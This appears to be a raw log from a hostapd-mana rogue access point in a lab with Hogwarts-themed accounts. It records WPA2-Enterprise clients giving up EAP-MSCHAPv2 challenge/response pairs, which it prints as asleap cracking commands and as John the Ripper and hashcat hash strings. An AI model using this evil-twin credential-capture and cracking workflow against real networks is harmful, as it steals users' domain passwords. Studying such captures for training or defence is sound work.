wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: authenticated
9
wlan1: STA 64:32:a8:07:6c:41 IEEE 802.11: associated (aid 1)
10
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:41
11
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
12
MANA EAP Identity Phase 0: Hogwarts\albus.dumbledore
13
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
14
MANA EAP Identity Phase 1: Hogwarts\albus.dumbledore
15
MANA EAP EAP-MSCHAPV2 ASLEAP user=albus.dumbledore | asleap -C 44:4f:6d:dc:28:55:c3:8c -R 05:58:4f:62:63:a5:1e:1b:54:87:96:29:6a:3a:62:85:1d:86:b8:d8:c4:d3:c2:70
16
MANA EAP EAP-MSCHAPV2 JTR | albus.dumbledore:$NETNTLM$444f6ddc2855c38c$05584f6263a51e1b548796296a3a62851d86b8d8c4d3c270:::::::
17
MANA EAP EAP-MSCHAPV2 HASHCAT | albus.dumbledore::::05584f6263a51e1b548796296a3a62851d86b8d8c4d3c270:444f6ddc2855c38c
18
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 0e 21 42 cf 50 0c fa 6e fb 8d a1 8d d8 63 0b 69
19
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: authenticated
20
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
21
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 1)
22
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
23
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
24
wlan1: STA 64:32:a8:07:6c:40 IEEE 802.11: associated (aid 2)
25
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
26
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
27
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:40
28
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
29
MANA EAP Identity Phase 0: Hogwarts\rubeus.hagrid
30
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
31
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
32
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C 29:da:39:7f:92:3f:f3:cf -R 12:33:3f:27:9b:59:d0:71:7c:85:35:c5:73:ca:5b:32:c9:62:32:01:92:a0:22:76
33
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$29da397f923ff3cf$12333f279b59d0717c8535c573ca5b32c962320192a02276:::::::
34
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::12333f279b59d0717c8535c573ca5b32c962320192a02276:29da397f923ff3cf
35
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 46 eb 92 c2 3e 75 f9 46 3e be d0 1f 04 76 b3 1c
36
MANA EAP Identity Phase 1: Hogwarts\rubeus.hagrid
37
MANA EAP EAP-MSCHAPV2 ASLEAP user=rubeus.hagrid | asleap -C 19:af:04:38:b5:3a:d2:f5 -R d1:b3:15:89:62:4c:ec:35:5f:0e:2a:dc:7c:3b:6f:be:22:80:fc:f4:d5:25:cd:5f
38
MANA EAP EAP-MSCHAPV2 JTR | rubeus.hagrid:$NETNTLM$19af0438b53ad2f5$d1b31589624cec355f0e2adc7c3b6fbe2280fcf4d525cd5f:::::::
39
MANA EAP EAP-MSCHAPV2 HASHCAT | rubeus.hagrid::::d1b31589624cec355f0e2adc7c3b6fbe2280fcf4d525cd5f:19af0438b53ad2f5
40
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): f4 16 05 b7 06 06 72 54 44 73 58 ba 18 74 69 c2
41
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: authenticated
42
wlan1: STA 64:32:a8:07:6c:42 IEEE 802.11: associated (aid 1)
43
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:42
44
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
45
MANA EAP Identity Phase 0: Hogwarts\minerva.mcgonagall
46
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
47
MANA EAP Identity Phase 1: Hogwarts\minerva.mcgonagall
48
MANA EAP EAP-MSCHAPV2 ASLEAP user=minerva.mcgonagall | asleap -C 25:57:75:5c:ec:b3:f8:80 -R 0b:a6:ba:03:d2:dc:76:13:b6:e5:71:bc:1a:60:5d:a7:ff:46:7d:df:9f:93:45:83
49
MANA EAP EAP-MSCHAPV2 JTR | minerva.mcgonagall:$NETNTLM$2557755cecb3f880$0ba6ba03d2dc7613b6e571bc1a605da7ff467ddf9f934583:::::::
50
MANA EAP EAP-MSCHAPV2 HASHCAT | minerva.mcgonagall::::0ba6ba03d2dc7613b6e571bc1a605da7ff467ddf9f934583:2557755cecb3f880
51
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): 91 10 e9 a6 f4 ac 73 15 d0 0b 3b ea 11 82 7b b2
52
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: authenticated
53
wlan1: STA 64:32:a8:07:6c:43 IEEE 802.11: associated (aid 1)
54
wlan1: CTRL-EVENT-EAP-STARTED 64:32:a8:07:6c:43
55
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
56
MANA EAP Identity Phase 0: Hogwarts\tom.riddle
57
wlan1: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
58
MANA EAP Identity Phase 1: Hogwarts\tom.riddle
59
MANA EAP EAP-MSCHAPV2 ASLEAP user=tom.riddle | asleap -C cd:28:fa:20:e8:bc:be:2b -R 5a:4b:35:fb:9d:cc:e6:32:7c:d8:79:64:6d:5f:47:c1:db:cf:d9:99:31:a7:26:87
60
MANA EAP EAP-MSCHAPV2 JTR | tom.riddle:$NETNTLM$cd28fa20e8bcbe2b$5a4b35fb9dcce6327cd879646d5f47c1dbcfd99931a72687:::::::
61
MANA EAP EAP-MSCHAPV2 HASHCAT | tom.riddle::::5a4b35fb9dcce6327cd879646d5f47c1dbcfd99931a72687:cd28fa20e8bcbe2b
62
EAP-MSCHAPV2: Derived Master Key - hexdump(len=16): fb a5 56 4a 59 98 41 70 7b a1 d6 d4 89 67 ee ff